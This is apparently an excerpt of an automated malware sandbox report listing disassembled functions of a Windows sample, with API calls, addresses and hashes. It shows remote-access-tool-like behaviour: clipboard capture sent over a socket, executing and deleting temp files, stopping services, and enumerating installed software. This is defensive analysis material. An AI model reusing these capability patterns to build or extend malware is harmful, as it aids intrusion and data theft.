                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00451321
                                • _free.LIBCMT ref: 00451336
                                • _free.LIBCMT ref: 00451341
                                • _free.LIBCMT ref: 00451363
                                • _free.LIBCMT ref: 00451376
                                • _free.LIBCMT ref: 00451384
                                • _free.LIBCMT ref: 0045138F
                                • _free.LIBCMT ref: 004513C7
                                • _free.LIBCMT ref: 004513CE
                                • _free.LIBCMT ref: 004513EB
                                • _free.LIBCMT ref: 00451403
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                • String ID:
                                • API String ID: 3658366068-0
                                • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                • GetLastError.KERNEL32 ref: 00455CEF
                                • __dosmaperr.LIBCMT ref: 00455CF6
                                • GetFileType.KERNEL32(00000000), ref: 00455D02
                                • GetLastError.KERNEL32 ref: 00455D0C
                                • __dosmaperr.LIBCMT ref: 00455D15
                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                • GetLastError.KERNEL32 ref: 00455EB1
                                • __dosmaperr.LIBCMT ref: 00455EB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                • __alloca_probe_16.LIBCMT ref: 00453EEA
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                • __alloca_probe_16.LIBCMT ref: 00453F94
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                • __freea.LIBCMT ref: 00454003
                                • __freea.LIBCMT ref: 0045400F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID: \@E
                                • API String ID: 201697637-1814623452
                                • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: \&G$\&G$`&G
                                • API String ID: 269201875-253610517
                                • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenClipboard.USER32 ref: 00416941
                                • EmptyClipboard.USER32 ref: 0041694F
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID: !D@$hdF
                                • API String ID: 2172192267-3475379602
                                • Opcode ID: 604ff0e650b7cbf0eb05cc5d47dbbf01a5686cd6b593f2ae7640030b5bdbb505
                                • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                • Opcode Fuzzy Hash: 604ff0e650b7cbf0eb05cc5d47dbbf01a5686cd6b593f2ae7640030b5bdbb505
                                • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                • __dosmaperr.LIBCMT ref: 0043A937
                                • _free.LIBCMT ref: 0043A943
                                • _free.LIBCMT ref: 0043A94A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                • TranslateMessage.USER32(?), ref: 0040557E
                                • DispatchMessageA.USER32(?), ref: 00405589
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: 76a1ce86a08fa156be11bd966dd8909bd5a19347d38f21f04759c98b853e25d9
                                • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                • Opcode Fuzzy Hash: 76a1ce86a08fa156be11bd966dd8909bd5a19347d38f21f04759c98b853e25d9
                                • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: 0VG$0VG$<$@$Temp
                                • API String ID: 1704390241-2575729100
                                • Opcode ID: a68fe472555a221cc9b32b7d705479c144bd783cb6920b13d56d72ce3c36b1e5
                                • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                • Opcode Fuzzy Hash: a68fe472555a221cc9b32b7d705479c144bd783cb6920b13d56d72ce3c36b1e5
                                • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                • int.LIBCPMT ref: 00410E81
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID: ,kG$0kG$@!G
                                • API String ID: 3815856325-312998898
                                • Opcode ID: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                • Opcode Fuzzy Hash: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 7b2cf5faf853fa98289cc991659be0cbca7e258cea3468f32c8f6232fd3e676c
                                • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                • Opcode Fuzzy Hash: 7b2cf5faf853fa98289cc991659be0cbca7e258cea3468f32c8f6232fd3e676c
                                • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00448135
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00448141
                                • _free.LIBCMT ref: 0044814C
                                • _free.LIBCMT ref: 00448157
                                • _free.LIBCMT ref: 00448162
                                • _free.LIBCMT ref: 0044816D
                                • _free.LIBCMT ref: 00448178
                                • _free.LIBCMT ref: 00448183
                                • _free.LIBCMT ref: 0044818E
                                • _free.LIBCMT ref: 0044819C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                Strings
                                • DisplayName, xrefs: 0041C73C
                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
